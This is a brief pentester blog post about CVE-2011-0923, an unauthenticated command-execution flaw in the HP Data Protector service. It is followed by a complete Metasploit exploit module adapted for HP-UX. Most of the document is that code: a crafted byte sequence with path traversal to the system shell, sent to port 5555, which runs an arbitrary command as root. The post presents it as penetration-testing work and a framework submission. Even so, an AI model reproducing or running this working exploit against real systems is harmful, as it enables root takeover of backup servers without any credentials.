HP Data Protector vuln

This is a quick post on a vuln we (ch0ks and I)identified and exploit in a HP-UX during a pentest. The vuln had been already reported on the ZDI site and had a working PoC on security focus. The thing is though, that the working exploit only worked for Windows servers and workstations. After some time of analysis by ch0ks and me during the pentest we figure out a way to execute commands on the HP-UX server with a modified version of the payload included in the PoC. The full explanation of how we did this can be found in Adrian's Puente (ch0ks) blog hackarandas.

The metasploit module that I developed using this analysis has been already submitted to the team and hopefully they will included in it. Just to show you guys that I am not full of it I included some screenshots of the execution of the module.

Module options:

Example of the working exploit runnng a simple command on the HP-UX (/usr/bin/id):

gr33tz to ch0ks, etlow.

c4an.

Exploit code:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'HP Data Protector Remote Command Execution',
            'Description'    => %q{
                    This exploit abuses a vulnerability in the HP Data
                Protector service. This flaw allows an unauthenticated
                attacker to execute arbitrary commands with the privileges
                of the root user.
            },
            'Author'         => [ 'c4an', 'ch0ks'],
            'Version'        => '$Revision: 10561 $',
            'References'     =>
                [
                    [ 'CVE', '2011-0923'],                   
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
                    [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
                    [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']

                ],
            'Platform'       => [ 'unix','linux'],
            'Arch'           => ARCH_CMD,
           
            'Payload'        =>
                {
                    'Space'       =>10000,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic',
                        }
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', {}]
                ],
            'DefaultTarget'  => 0,
           
            'DisclosureDate' => 'June 26 2011'
        ))

        register_options(
            [
                Opt::RPORT(5555),               
            ], self.class)
    end

    def exploit
        print_status("Sending our commmand...")
        # Send the job request with the encoded command
       
        shell_mio = "usr/bin/sh"
        salto = "\n"
        s = salto.encode
       
        shellcode = "\x00\x00\x00\xa4\x20\x32\x00\x20\x63\x34\x61\x6e\x63\x34\x61\x6e" +
            "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x63\x34\x61\x6e" +
            "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20\x63\x34" +
            "\x61\x6e\x20\x20\x20\x20\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" +
            "\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" +
            "\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" +
            "\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" +
            "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" +
            "\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
        shell =     shell_mio +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  +
                    payload.encode + s
                   
        sploit = shellcode + shell
       
        begin
            connect
            sock.put(sploit)
            res = sock.get
            print_status(res.to_s)
            handler           
        rescue
            print_status("Error in connection or socket")
        end
    end
end